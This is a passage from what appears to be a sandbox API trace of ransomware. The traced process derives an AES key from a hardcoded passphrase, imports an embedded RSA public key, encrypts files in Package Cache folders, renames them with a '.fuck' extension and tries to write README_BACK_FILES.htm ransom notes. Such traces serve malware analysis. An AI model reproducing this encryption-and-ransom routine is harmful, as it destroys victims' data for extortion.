(in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.898] GetLastError () returned 0x5 [0240.898] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0240.898] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0240.899] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.899] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.900] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.900] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1fd0) returned 1 [0240.903] CryptCreateHash (in: hProv=0x28f1fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.903] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.903] CryptHashData (hHash=0x28e7878, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.903] CryptDeriveKey (in: hProv=0x28f1fd0, Algid=0x6610, hBaseData=0x28e7878, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7538) returned 1 [0240.903] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.903] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.903] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2c08) returned 1 [0240.903] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2c08, dwCertEncodingType=0x1, pInfo=0x2905278*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29052a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29052b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7678) returned 1 [0240.903] CryptEncrypt (in: hKey=0x28e7678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.904] CryptEncrypt (in: hKey=0x28e7678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f28d8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f28d8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f28d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.904] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.904] CryptEncrypt (in: hKey=0x28e7538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.904] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.904] CloseHandle (hObject=0xffffffff) returned 1 [0240.904] CloseHandle (hObject=0xffffffff) returned 1 [0240.904] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0240.905] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0240.905] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0240.905] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0240.906] CryptDestroyHash (hHash=0x28e7878) returned 1 [0240.906] CryptDestroyKey (hKey=0x28e7538) returned 1 [0240.906] CryptReleaseContext (hProv=0x28f1fd0, dwFlags=0x0) returned 1 [0240.906] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.906] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.906] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0240.907] AreFileApisANSI () returned 1 [0240.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28db598, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139 [0240.907] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.907] GetLastError () returned 0x5 [0240.907] GetLastError () returned 0x5 [0240.907] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.907] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.908] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.908] AreFileApisANSI () returned 1 [0240.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.908] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.908] GetLastError () returned 0x5 [0240.908] GetLastError () returned 0x5 [0240.908] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.908] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.909] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\readme_back_files.htm")) returned 0xffffffff [0240.909] AreFileApisANSI () returned 1 [0240.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e29b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.909] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{be960c1c-7bad-3de6-8b1a-2616fe532845}v14.0.23026\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.909] GetLastError () returned 0x5 [0240.909] GetLastError () returned 0x5 [0240.909] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.909] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e8638 [0240.910] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.910] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.910] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0240.910] GetLastError () returned 0x5 [0240.910] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm")) returned 0x20 [0240.910] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x80) returned 0 [0240.910] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.911] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.911] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg", dwFileAttributes=0x2) returned 0 [0240.912] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x28f6348) returned 1 [0240.915] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0240.915] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.915] CryptHashData (hHash=0x28e84f8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.915] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e84f8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28e7238) returned 1 [0240.915] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.915] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0240.915] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f1420) returned 1 [0240.916] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1420, dwCertEncodingType=0x1, pInfo=0x2905348*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905378*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905380*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e7a38) returned 1 [0240.916] CryptEncrypt (in: hKey=0x28e7a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.916] CryptEncrypt (in: hKey=0x28e7a38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1d28*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f1d28*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1d28, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.916] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.916] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.916] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.916] CloseHandle (hObject=0xffffffff) returned 1 [0240.916] CloseHandle (hObject=0xffffffff) returned 1 [0240.916] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), bFailIfExists=0) returned 0 [0240.917] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.917] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.gsg")) returned 0 [0240.918] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.fuck")) returned 0 [0240.918] CryptDestroyHash (hHash=0x28e84f8) returned 1 [0240.918] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.918] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.918] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.918] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.918] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.918] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\readme_back_files.htm")) returned 0xffffffff [0240.919] AreFileApisANSI () returned 1 [0240.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e2648, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.919] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.919] GetLastError () returned 0x5 [0240.919] GetLastError () returned 0x5 [0240.919] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.919] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.920] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.920] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.920] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.920] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.920] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.920] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.920] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.920] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.920] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.920] GetLastError () returned 0x5 [0240.921] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0240.921] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.921] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.922] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.923] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.923] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f2b80) returned 1 [0240.926] CryptCreateHash (in: hProv=0x28f2b80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.926] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.926] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.926] CryptDeriveKey (in: hProv=0x28f2b80, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7378) returned 1 [0240.926] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, 